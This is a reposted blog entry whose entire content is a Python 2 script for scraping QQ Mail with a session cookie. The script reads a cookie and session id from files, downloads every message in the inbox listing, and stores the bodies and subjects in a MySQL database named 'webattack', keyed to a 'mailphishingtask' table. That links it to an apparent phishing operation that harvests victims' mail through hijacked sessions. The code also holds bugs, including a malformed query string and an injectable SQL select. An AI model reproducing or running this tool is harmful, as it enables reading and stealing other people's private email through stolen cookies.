利用cookie爬取QQ邮箱的python脚本

  1 # -*- coding: utf-8 -*-
  2 import requests
  3 import time
  4 from bs4 import BeautifulSoup
  5 import re
  6 import sys
  7 import json
  8 import pymysql
  9 
 10 
 11 def ct_content(url,payload):
 12     s = requests.session()
 13     
 14     header = {\
 15             
 16             'Referer': 'https://mail.qq.com/cgi-bin/frame_html?t=newwin_frame&sid=M6EI2PkDteRzaXkj&url=/cgi-bin/readmail?folderid=1%26folderkey=1%26t=readmail%26mailid=ZC4411-kQP8LA2p7r_ALDxmjE83W82%26mode=pre%26maxage=3600%26base=12.870000000000001%26ver=36726',
 17             'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36',
 18         
 19             'Upgrade-Insecure-Requests':'1'}
 20     
 21     f = open('cookie.txt', 'r')
 22     t = f.read()
 23     header['cookie'] = t
 24 
 25 
 26     
 27     response = s.get(url, headers=header,  params=payload, timeout=80)
 28     
 29     
 30     
 31     html = response.text
 32     
 33     return html
 34 
 35 def get_mailid(sid):
 36     ids = []
 37     for page in range(1):
 38         url = "https://mail.qq.com/cgi-bin/mail_list?"
 39         payload ='sid={0:s}=personal&folderkey=-3&page={0:s}&stype=myfolders&ver=333674.0&cachemod=maillist&cacheage=7200&r='.format(sid,page)
 40         html = ct_content(url,payload)
 41         soup = BeautifulSoup(html, 'lxml')
 42         where = soup.find_all("input")
 43 
 44         for i in where:
 45             t = str(i)
 46 
 47             xp = re.findall("value=\"(.*?)\"/>", t)
 48             if (len(str(xp)[2:-2]) == 30):
 49                 id=str(xp)[2:-2]
 50                 #print id
 51                 ids.append(id)
 52     print len(ids)
 53     return ids
 54 
 55 def get_sid():
 56     f = open('sid.txt', 'r')
 57     t = f.read()
 58     return t
 59 
 60 def get_mail(mailid,sid):
 61     url = "https://mail.qq.com/cgi-bin/readmail?"
 62     payload = 'folderid=1&folderkey=1&t=readmail&mailid={0:s}&mode=pre&maxage=3600&base=12.57&ver=16137&sid={1:s}'.format(mailid, sid)
 63     #print payload
 64     html = ct_content(url, payload)
 65     html =  html.replace("gb18030","utf-8")
 66     return html
 67     #soup = BeautifulSoup(html, 'lxml')
 68 
 69 def get_sub(html):
 70     soup = BeautifulSoup(html, 'lxml')
 71     where = soup.find_all("title")
 72     return where[0].string
 73 
 74 def fs (key, cook):
 75     cook = cook.replace('ssid', '')
 76     kl = cook.find(key)
 77     fl = cook.find(";", kl)
 78     return cook[kl+len(key)+1:fl]
 79 
 80 def get_cookie():
 81     f = open('cookie.txt', 'r')
 82     t = f.read()
 83     value = {}
 84     value['sid'] = fs('sid', t)
 85     '''
 86     value['pgv_pvi'] =  fs('pgv_pvi',t)
 87     value['pt2gguin'] = fs('pt2gguin',t)
 88     value['foxacc'] = fs('foxacc', t)
 89     value['p_skey'] = fs('p_skey', t)
 90     value['pt4_token'] = fs('pt4_token', t)
 91     value['qm_ptsk'] = fs('qm_ptsk', t)
 92     value['sid'] = fs('sid', t)
 93     value['RK'] = fs('RK', t)
 94     value['skey'] = fs('skey', t)
 95     value['uin'] = fs('uin', t)
 96     
 97     
 98     value['ptcz'] = fs('ptcz',t)
 99     value['edition'] = fs('edition',t)
100     value['ptui_loginuin'] = fs('ptui_loginuin',t)
101     value['pgv_pvid'] = fs('pgv_pvid',t)
102     value['ptisp'] = fs('ptisp',t)
103     value['pgv_si'] = fs('pgv_si',t)
104     value['wimrefreshrun'] = fs('wimrefreshrun',t)
105     value['qm_antisky'] = fs('qm_antisky',t)
106     value['qm_domain'] = fs('qm_domain',t)
107     value['qm_flag'] = fs('qm_flag',t)
108     value['qm_loginfrom'] = fs('qm_loginfrom',t)
109     '''
110     return value
111 
112 def main():
113     #os.system('calc')
114     reload(sys)
115     sys.setdefaultencoding('utf8')
116     key = sys.argv[1]
117     
118     conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='root', db='webattack',charset='utf8')
119     cursor = conn.cursor()
120     global cookie
121     #cookie = get_cookie()
122     #print cookie
123 
124 
125 
126     subs = []
127     sid =get_sid()
128     #print sid
129     mailids = get_mailid(sid)
130     print len(mailids)
131     mails = []
132 
133     for id in mailids:
134        mail = get_mail(id,sid)
135       
136        mails.append(mail)
137     
138        sub = get_sub(mail)
139        subs.append(sub)
140     sql_select = "SELECT id,uid,target FROM mailphishingtask where tkey='%s' ;" % key
141     cursor.execute(sql_select)
142 
143     data = cursor.fetchone()
144     tid = int(data[0])
145     uid = int(data[1])
146     mailbox = data[2]
147     addtime = int(time.time())
148 
149     for i in range(len(mailids)):
150         ls = [[1], ]
151         l = [mailids[i], mails[i],subs[i],tid,uid,mailbox,addtime]
152         ls.append(l)
153         del ls[0]
154         sql = 'INSERT INTO mails (mailid,mailcontent,sub,pid,uid,mailbox,addtime) VALUES (%s,%s,%s,%s,%s,%s,%s)'
155         cursor = conn.cursor()
156         cursor.executemany(sql, ls)
157         cursor.close()
158         conn.commit()
159 
160 
161 
162     conn.close()
163 
164 
165 if __name__ == '__main__':
166     main()

猜你喜欢

转载自www.cnblogs.com/baizhu/p/9398563.html
今日推荐